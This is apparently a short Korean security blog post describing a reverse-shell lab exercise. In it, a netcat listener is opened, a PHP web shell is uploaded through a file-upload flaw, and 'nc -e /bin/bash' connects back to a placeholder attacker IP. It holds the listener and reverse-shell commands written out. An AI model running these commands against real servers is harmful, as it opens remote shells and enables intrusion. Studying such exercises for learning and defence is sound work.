Web/Attack

리버스 쉘(Reverse Shell) 실습(with netcat)

Alioth02 2024. 7. 21. 00:19

1. 공격자 서버 포트 리스닝

nc -l -p [포트번호]

공격자 서버에서 netcat 도구를 활용해 1024번 포트를 리스닝으로 열어 놓는다.

2. 웹 쉘 업로드

파일 업로드 취약점이 있는 개인 홈페이지에

php로 작성된 웹 쉘을 업로드했다.

3. 리버스 쉘 작성

nc -e /bin/bash [공격자 서버 IP] [포트번호]

 

업로드된 웹 쉘에

피해자 서버의 쉘을 공격자의 서버로 전달하는 netcat 명령어를 입력했다.

4. 피해자 서버 장악

공격자 서버에서

피해자 서버의 쉘을 이용할 수 있게 된 모습을 볼 수 있다.